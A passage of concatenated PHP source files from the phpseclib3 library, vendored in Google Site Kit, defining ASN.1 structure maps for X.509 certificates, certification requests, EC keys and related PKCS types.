+ \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DirectoryString::MAP, // partyName is technically required but \phpseclib3\File\ASN1 doesn't currently support non-optional constants and // setting it to optional gets the job done in any event. 'partyName' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DirectoryString::MAP, ]]; } <?php /** * EcdsaSigValue * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * EcdsaSigValue * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EcdsaSigValue { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['r' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 's' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * CertificationRequest * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertificationRequest * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificationRequest { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['certificationRequestInfo' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificationRequestInfo::MAP, 'signatureAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'signature' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * netscape_cert_type * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * netscape_cert_type * * mapping is from <http://www.mozilla.org/projects/security/pki/nss/tech-notes/tn3.html> * * @author Jim Wigginton <terrafrost@php.net> */ abstract class netscape_cert_type { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING, 'mapping' => ['SSLClient', 'SSLServer', 'Email', 'ObjectSigning', 'Reserved', 'SSLCA', 'EmailCA', 'ObjectSigningCA']]; } <?php /** * CertificationRequestInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertificationRequestInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificationRequestInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => ['v1']], 'subject' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP, 'subjectPKInfo' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP, 'attributes' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Attributes::MAP]]; } <?php /** * DHParameter * * From: https://www.teletrust.de/fileadmin/files/oid/oid_pkcs-3v1-4.pdf#page=6 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DHParameter * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DHParameter { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['prime' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'base' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'privateValueLength' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'optional' => \true]]]; } <?php /** * GeneralSubtrees * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * GeneralSubtrees * * @author Jim Wigginton <terrafrost@php.net> */ abstract class GeneralSubtrees { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralSubtree::MAP]; } <?php /** * NoticeReference * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * NoticeReference * * @author Jim Wigginton <terrafrost@php.net> */ abstract class NoticeReference { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['organization' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DisplayText::MAP, 'noticeNumbers' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 200, 'children' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]]; } <?php /** * KeyIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * KeyIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class KeyIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]; } <?php /** * PolicyQualifierId * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PolicyQualifierId * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PolicyQualifierId { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER]; } <?php /** * EncryptedData * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * EncryptedData * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EncryptedData { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]; } <?php /** * OrganizationalUnitNames * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * OrganizationalUnitNames * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OrganizationalUnitNames { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 4, // ub-organizational-units 'children' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING], ]; } <?php /** * NumericUserIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * NumericUserIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class NumericUserIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NUMERIC_STRING]; } <?php /** * RSASSA_PSS_params * * As defined in https://tools.ietf.org/html/rfc4055#section-3.1 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RSASSA_PSS_params * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RSASSA_PSS_params { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['hashAlgorithm' => ['constant' => 0, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\HashAlgorithm::MAP, 'maskGenAlgorithm' => ['constant' => 1, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\MaskGenAlgorithm::MAP, 'saltLength' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'constant' => 2, 'optional' => \true, 'explicit' => \true, 'default' => 20], 'trailerField' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'constant' => 3, 'optional' => \true, 'explicit' => \true, 'default' => 1]]]; } <?php /** * DistributionPoint * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DistributionPoint * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DistributionPoint { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['distributionPoint' => ['constant' => 0, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DistributionPointName::MAP, 'reasons' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ReasonFlags::MAP, 'cRLIssuer' => ['constant' => 2, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP]]; } <?php /** * HoldInstructionCode * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * HoldInstructionCode * * @author Jim Wigginton <terrafrost@php.net> */ abstract class HoldInstructionCode { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER]; } <?php /** * SubjectAltName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * SubjectAltName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SubjectAltName { const MAP = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP; } <?php /** * RC2CBCParameter * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RC2CBCParameter * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RC2CBCParameter { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['rc2ParametersVersion' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'optional' => \true], 'iv' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]]]; } <?php /** * OtherPrimeInfos * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * OtherPrimeInfos * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OtherPrimeInfos { // version must be multi if otherPrimeInfos present const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\OtherPrimeInfo::MAP]; } <?php /** * netscape_ca_policy_url * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * netscape_ca_policy_url * * @author Jim Wigginton <terrafrost@php.net> */ abstract class netscape_ca_policy_url { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING]; } <?php /** * ECPrivateKey * * From: https://tools.ietf.org/html/rfc5915 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ECPrivateKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ECPrivateKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => [1 => 'ecPrivkeyVer1']], 'privateKey' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING], 'parameters' => ['constant' => 0, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP, 'publicKey' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING, 'constant' => 1, 'optional' => \true, 'explicit' => \true]]]; } <?php /** * BasicConstraints * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * BasicConstraints * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BasicConstraints { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['cA' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'optional' => \true, 'default' => \false], 'pathLenConstraint' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'optional' => \true]]]; } <?php /** * CountryName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CountryName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CountryName { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, // if class isn't present it's assumed to be \phpseclib3\File\ASN1::CLASS_UNIVERSAL or // (if constant is present) \phpseclib3\File\ASN1::CLASS_CONTEXT_SPECIFIC 'class' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::CLASS_APPLICATION, 'cast' => 1, 'children' => ['x121-dcc-code' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NUMERIC_STRING], 'iso-3166-alpha2-code' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]], ]; } <?php /** * PolicyInformation * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PolicyInformation * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PolicyInformation { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['policyIdentifier' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertPolicyId::MAP, 'policyQualifiers' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 0, 'max' => -1, 'optional' => \true, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PolicyQualifierInfo::MAP]]]; } <?php /** * ECParameters * * From: https://tools.ietf.org/html/rfc5915 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ECParameters * * ECParameters ::= CHOICE { * namedCurve OBJECT IDENTIFIER * -- implicitCurve NULL * -- specifiedCurve SpecifiedECDomain * } * -- implicitCurve and specifiedCurve MUST NOT be used in PKIX. * -- Details for SpecifiedECDomain can be found in [X9.62]. * -- Any future additions to this CHOICE should be coordinated * -- with ANSI X9. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ECParameters { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['namedCurve' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'implicitCurve' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NULL], 'specifiedCurve' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SpecifiedECDomain::MAP]]; } <?php /** * BuiltInDomainDefinedAttribute * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * BuiltInDomainDefinedAttribute * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BuiltInDomainDefinedAttribute { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['type' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING], 'value' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]]]; } <?php /** * Attributes * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Attributes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Attributes { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Attribute::MAP]; } <?php /** * DisplayText * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DisplayText * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DisplayText { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['ia5String' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING], 'visibleString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_VISIBLE_STRING], 'bmpString' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BMP_STRING], 'utf8String' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]]]; } <?php /** * CertificateSerialNumber * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CertificateSerialNumber * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificateSerialNumber { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * ExtKeyUsageSyntax * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ExtKeyUsageSyntax * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ExtKeyUsageSyntax { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\KeyPurposeId::MAP]; } <?php /** * DigestInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DigestInfo * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DigestInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['digestAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'digest' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]]]; } <?php /** * Attribute * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Attribute * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Attribute { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeType::MAP, 'value' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeValue::MAP]]]; } <?php /** * PBMAC1params * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PBMAC1params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PBMAC1params { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['keyDerivationFunc' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'messageAuthScheme' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP]]; } <?php /** * RDNSequence * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RDNSequence * * In practice, RDNs containing multiple name-value pairs (called "multivalued RDNs") are rare, * but they can be useful at times when either there is no unique attribute in the entry or you * want to ensure that the entry's DN contains some useful identifying information. * * - https://www.opends.org/wiki/page/DefinitionRelativeDistinguishedName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RDNSequence { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, // RDNSequence does not define a min or a max, which means it doesn't have one 'min' => 0, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RelativeDistinguishedName::MAP, ]; } <?php /** * Name * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Name * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Name { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['rdnSequence' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RDNSequence::MAP]]; } <?php /** * UniqueIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * UniqueIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class UniqueIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]; } <?php /** * PKCS9String * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * 